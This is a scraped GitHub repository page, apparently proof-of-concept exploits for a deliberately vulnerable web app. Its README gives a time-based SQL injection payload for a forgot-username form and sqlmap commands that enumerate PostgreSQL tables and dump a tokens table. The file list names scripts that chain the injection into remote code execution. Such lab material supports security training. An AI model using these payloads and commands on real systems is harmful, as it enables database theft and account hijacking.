tudo-poc

SQLi via SQL map for quick DB enumeration:
	- 	POST /forgotusername.php
		username=';select+pg_sleep(5);+--+
	
	1. save Burp POST /forgotusername.php (remove cookie) to sqli-psot-req.txt
	2. Enumerate DB schemas: 
		- sqlmap -r sqli-post-req.txt -p username --dbms=PostgreSQL --dbs
		- sqlmap -r sqli-post-req.txt -p username --dbms=PostgreSQL --tables
		- sqlmap -r sqli-post-req.txt -p username --dbms=PostgreSQL -T users --columns
		- sqlmap -r sqli-post-req.txt -p username --dbms=PostgreSQL -T tokens --columns
   	    - sqlmap -r sqli-post-req.txt -p username --dbms=PostgreSQL -T tokens --dump


	tables in SQL:
	- create table users(uid int4, username text, password text, description text);
	- create table tokens(uid int4, tid int4, token text);

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
README.md		README.md
exploit.py		exploit.py
simulate_admin.py		simulate_admin.py
sqli-psql-rce.py		sqli-psql-rce.py
sqli-sess_hijack-deserialize-rce.py		sqli-sess_hijack-deserialize-rce.py
sqli-sess_hijack-file_upload-rce.py		sqli-sess_hijack-file_upload-rce.py
sqli-sess_hijack-ssti-rce.py		sqli-sess_hijack-ssti-rce.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

tudo-poc

About

Releases

Packages

Languages

nicchongwb/tudo-poc

Folders and files

Latest commit

History

Repository files navigation

tudo-poc

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages